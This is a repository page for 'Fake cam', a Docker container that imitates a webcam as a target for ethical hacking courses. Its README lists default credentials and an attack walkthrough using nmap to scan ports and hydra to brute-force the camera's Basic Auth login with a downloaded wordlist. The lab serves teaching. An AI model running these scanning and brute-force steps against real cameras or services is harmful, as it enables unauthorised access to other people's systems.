2026-04-15 15:56:13 +02:00
2026-04-07 22:40:36 +02:00
2026-04-15 15:55:47 +02:00
2026-04-15 15:53:13 +02:00
2026-04-07 22:28:19 +02:00
2026-04-15 15:53:31 +02:00
2026-04-07 22:39:38 +02:00
2026-04-07 22:24:29 +02:00
2026-04-15 15:56:13 +02:00
2026-04-07 20:13:07 +00:00
2026-04-07 20:13:07 +00:00

Fake cam

Fake cam is a simple docker container running a fake webcam. It is used for educational purposes to teach ethical hacking.

Default creds are : admin | cam123

Requirements

  • Docker

Install

  1. Pull the repository
git clone https://git.phorge.fr/l-nmch/fake-cam.git
  1. Build the image
docker compose build

Deploy

  1. Run the container
docker compose up -d
  1. Verify cam access
curl -u admin:cam123 http://<ip>:3301

Attack

  1. Install required tools
apt install hydra curl nmap zip unzip -y
  1. Download the wordlist
wget https://git.phorge.fr/l-nmch/fake-cam/raw/branch/master/wordlist.txt
unzip rockyou.txt.zip
  1. Find open ports:
nmap -sC -sV <ip>
  1. Bruteforce Basic-Auth
hydra -l admin -P wordlist.txt -s 3301 <ip> http-get /
Description
Fake webcam for ethical hacking courses
Readme 8.5 MiB
Languages
HTML 86.2%
Shell 8.2%
Dockerfile 5.6%